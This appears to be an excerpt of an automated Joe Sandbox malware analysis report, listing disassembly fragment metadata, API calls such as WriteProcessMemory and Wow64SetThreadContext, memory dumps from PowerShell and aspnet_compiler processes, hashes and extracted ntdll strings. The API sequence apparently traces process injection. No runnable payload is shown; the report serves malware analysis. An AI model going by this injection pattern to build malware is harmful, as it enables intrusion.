                                                                                                        • Opcode ID: 04e932a4212df3a82a335850aefc1ed66fe190719fbf0ecb45e02dc87f883c91
                                                                                                        • Instruction ID: d33c4fc768edcd9955d0ecad8bc37323cb08396f2cb84a63a62ca6d5bd82bc66
                                                                                                        • Opcode Fuzzy Hash: 04e932a4212df3a82a335850aefc1ed66fe190719fbf0ecb45e02dc87f883c91
                                                                                                        • Instruction Fuzzy Hash: CA51287190125ADFDF24CF99D840BDEBBB5BF48310F1484AAE908B7250D7759A85CF50

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18E62514,00000000,?,?,?,00000000,00000000,?,035B8B6F,?,00000000,?), ref: 035B96FC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1751350367.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_35b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 047cbd6e6f975934aa585f092d9a0225cfe7d420c3ccfcddfc0c5d9131cfffd7
                                                                                                        • Instruction ID: 9fa805a6a2f4b038389552972e63a5f6c437b8b653e8fa95e40784a5c67b24fc
                                                                                                        • Opcode Fuzzy Hash: 047cbd6e6f975934aa585f092d9a0225cfe7d420c3ccfcddfc0c5d9131cfffd7
                                                                                                        • Instruction Fuzzy Hash: E0213AB59003099FDB10CF9AD885BDEFBF4FB48320F10842AE518A7250D378A544CFA4

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18E62514,00000000,?,?,?,00000000,00000000,?,035B8B6F,?,00000000,?), ref: 035B96FC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1751350367.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_35b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 65a1549a337d00817793887125415e593432dfc2dc5943ef636b7721bacecbd4
                                                                                                        • Instruction ID: 24da3208260a58d3d9f85fc400ff325906d468a24649adfcbf1cce892f25237d
                                                                                                        • Opcode Fuzzy Hash: 65a1549a337d00817793887125415e593432dfc2dc5943ef636b7721bacecbd4
                                                                                                        • Instruction Fuzzy Hash: 1D21E4B19003599FDB10CF9AD984BDEFBF4FB48320F54842AE958A7250D378A944CFA5

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,035B8923), ref: 035B925B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1751350367.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_35b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: 2e90381a4c3f1e72a0363a3779d2367e31a4c0373e7c50b1dec1ddd941cfa511
                                                                                                        • Instruction ID: 457e03905b9dc44034971bbeb53873de4cba746e673624ba416564c8785c418f
                                                                                                        • Opcode Fuzzy Hash: 2e90381a4c3f1e72a0363a3779d2367e31a4c0373e7c50b1dec1ddd941cfa511
                                                                                                        • Instruction Fuzzy Hash: E31147B6C042098FDB10CF9AD844BDEFBF4EB88220F14802AD468A3650D778A5458FA5

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,035B8923), ref: 035B925B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1751350367.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_35b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: d6106f4b4d5f494378ff32a8dc42eb2a6548ed4414a1b3b5ed89e1bd5e3535c8
                                                                                                        • Instruction ID: a92235b9b4f7496405ae64e35f908f6b3e006662698f1bc48a62405a9dcf491d
                                                                                                        • Opcode Fuzzy Hash: d6106f4b4d5f494378ff32a8dc42eb2a6548ed4414a1b3b5ed89e1bd5e3535c8
                                                                                                        • Instruction Fuzzy Hash: 0C1126B1D003498FDB10CF9AD884BDEFBF5FB89220F148429E568A3650D778A545CFA5

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,035B8923), ref: 035B925B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1751350367.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_35b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: 0e77d37bc3e36029d72fbba804b078738071acb1abdafd52b66aa3f9e1941356
                                                                                                        • Instruction ID: 770c0e1afc9d5cc7222df6efc7c91f9e9f4beea86640f12cde7d4f95ff56abeb
                                                                                                        • Opcode Fuzzy Hash: 0e77d37bc3e36029d72fbba804b078738071acb1abdafd52b66aa3f9e1941356
                                                                                                        • Instruction Fuzzy Hash: 891126B1D003498FDB10CF9AD844BDEFBF5FB88220F14802AE568A3650D778A545CFA5

                                                                                                        Control-flow Graph

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786825555.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9b170ad691c051be9cc0a696300d431f946ac195950f6b4e5d5c08f06bec32ca
                                                                                                        • Instruction ID: deecedee794e83300b42b52491f7b34e769073c2d54ef9df85e70c2cb7a32ce5
                                                                                                        • Opcode Fuzzy Hash: 9b170ad691c051be9cc0a696300d431f946ac195950f6b4e5d5c08f06bec32ca
                                                                                                        • Instruction Fuzzy Hash: 28B149B171430AAFDB249A69981076AFBA5EFC5611F24E07BD846CB2C1DB31C841C7E1

                                                                                                        Control-flow Graph

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786825555.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_7d00000_powershell.jbxd

                                                                                                        Control-flow Graph

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786825555.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_7d00000_powershell.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1750814322.000000000354D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0354D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_354d000_powershell.jbxd

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:1.5%
                                                                                                        Dynamic/Decrypted Code Coverage:4.7%
                                                                                                        Signature Coverage:8%
                                                                                                        Total number of Nodes:150
                                                                                                        Total number of Limit Nodes:17

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 217 417db3-417dcf 218 417dd7-417ddc 217->218 219 417dd2 call 42f9a3 217->219 220 417de2-417df0 call 42ffa3 218->220 221 417dde-417de1 218->221 219->218 224 417e00-417e11 call 42e443 220->224 225 417df2-417dfd call 430243 220->225 230 417e13-417e27 LdrLoadDll 224->230 231 417e2a-417e2d 224->231 225->224 230->231
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417E25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 251 42cce3-42cd1c call 404823 call 42df33 NtClose
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CD17
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 265 17c2b60-17c2b6c LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: e65f3187a80e65322745a84d915946ec9bc6b58d175e5933dae3abbeb1c82eca
                                                                                                        • Instruction ID: ff9ab6420f54643dbd7d249b8bc3df1e66f5096b634ff15415f738a077b02d68
                                                                                                        • Opcode Fuzzy Hash: e65f3187a80e65322745a84d915946ec9bc6b58d175e5933dae3abbeb1c82eca
                                                                                                        • Instruction Fuzzy Hash: 4490026520641403420571584414616802A97E0201B55C031E10145A0DC5258A916227
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 0 4145e7-4145eb 2 414656-414691 call 404793 call 425483 0->2 3 4145ed-4145f7 0->3 14 4146b3-4146b8 2->14 15 414693-4146a4 PostThreadMessageW 2->15 5 4145f9-414606 3->5 6 41458c-414595 3->6 5->2 8 4145b0-4145c6 6->8 9 414597-4145a9 6->9 11 4145ca-4145d0 8->11 11->11 13 4145d2-4145e5 11->13 13->0 15->14 16 4146a6-4146b0 15->16 16->14
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(6311_I4d42,00000111,00000000,00000000), ref: 004146A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: 6311_I4d42$6311_I4d42
                                                                                                        • API String ID: 1836367815-1003168663

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 17 414615-414618 18 41461a-41465f call 42ee63 call 42f873 call 417db3 17->18 19 4145fc-414606 17->19 26 414666-414691 call 425483 18->26 27 414661 call 404793 18->27 19->17 30 4146b3-4146b8 26->30 31 414693-4146a4 PostThreadMessageW 26->31 27->26 31->30 32 4146a6-4146b0 31->32 32->30
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(6311_I4d42,00000111,00000000,00000000), ref: 004146A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: 6311_I4d42$6311_I4d42
                                                                                                        • API String ID: 1836367815-1003168663

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 33 414623-414633 34 41463c-41465f call 42f873 call 417db3 33->34 35 414637 call 42ee63 33->35 40 414666-414691 call 425483 34->40 41 414661 call 404793 34->41 35->34 44 4146b3-4146b8 40->44 45 414693-4146a4 PostThreadMessageW 40->45 41->40 45->44 46 4146a6-4146b0 45->46 46->44
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(6311_I4d42,00000111,00000000,00000000), ref: 004146A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: 6311_I4d42$6311_I4d42
                                                                                                        • API String ID: 1836367815-1003168663

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 232 417e67-417e68 233 417e18-417e27 LdrLoadDll 232->233 234 417e6a-417e76 232->234 235 417e2a-417e2d 233->235 237 417e78-417e8a 234->237 238 417e9a-417ec3 234->238 239 417f08-417f11 237->239 240 417e8c-417e8e 237->240 238->239
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417E25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 246 42d043-42d084 call 404823 call 42df33 RtlFreeHeap
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,19CBA06B,00000007,00000000,00000004,00000000,0041762D,000000F4), ref: 0042D07F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 241 42cff3-42d034 call 404823 call 42df33 RtlAllocateHeap
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,0041EB84,?,?,00000000,?,0041EB84,?,?,?), ref: 0042D02F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 256 42d093-42d0cc call 404823 call 42df33 ExitProcess
                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,08B1C329,?,?,08B1C329), ref: 0042D0C7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_400000_aspnet_compiler.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 261 17c2c0a-17c2c0f 262 17c2c1f-17c2c26 LdrInitializeThunk 261->262 263 17c2c11-17c2c18 261->263
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2160512332
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                        • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                        Strings
                                                                                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 0177D196
                                                                                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0177D146
                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0177D2C3
                                                                                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0177D262
                                                                                                        • @, xrefs: 0177D2AF
                                                                                                        • @, xrefs: 0177D0FD
                                                                                                        • @, xrefs: 0177D313
                                                                                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0177D0CF
                                                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                        Strings
                                                                                                        • apphelp.dll, xrefs: 01776496
                                                                                                        • LdrpInitShimEngine, xrefs: 017D99F4, 017D9A07, 017D9A30
                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017D9A01
                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017D99ED
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017D9A11, 017D9A3A
                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017D9A2A
                                                                                                        Strings
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017F02BD
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017F02E7
                                                                                                        • RTL: Re-Waiting, xrefs: 017F031E
                                                                                                        Strings
                                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 017A527B
                                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 017A5352
                                                                                                        • Kernel-MUI-Language-SKU, xrefs: 017A542B
                                                                                                        • WindowsExcludedProcs, xrefs: 017A522A
                                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 017A5247
                                                                                                        APIs
                                                                                                          • Part of subcall function 017C2DF0: LdrInitializeThunk.NTDLL ref: 017C2DFA
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C0BA3
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C0BB6
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C0D60
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017C0D74
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                        • API String ID: 0-3178619729
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-3570731704
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                        • API String ID: 0-379654539
                                                                                                        Strings
                                                                                                        • @, xrefs: 017B8591
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017B8421
                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017B855E
                                                                                                        • LdrpInitializeProcess, xrefs: 017B8422
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-1918872054
                                                                                                        Strings
                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 017E1028
                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017E10AE
                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 017E106B
                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 017E0FE5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                        • API String ID: 0-1468400865
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                        • API String ID: 0-336120773
                                                                                                        Strings
                                                                                                        • apphelp.dll, xrefs: 017A2462
                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 017EA992
                                                                                                        • LdrpDynamicShimModule, xrefs: 017EA998
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017EA9A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-176724104
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
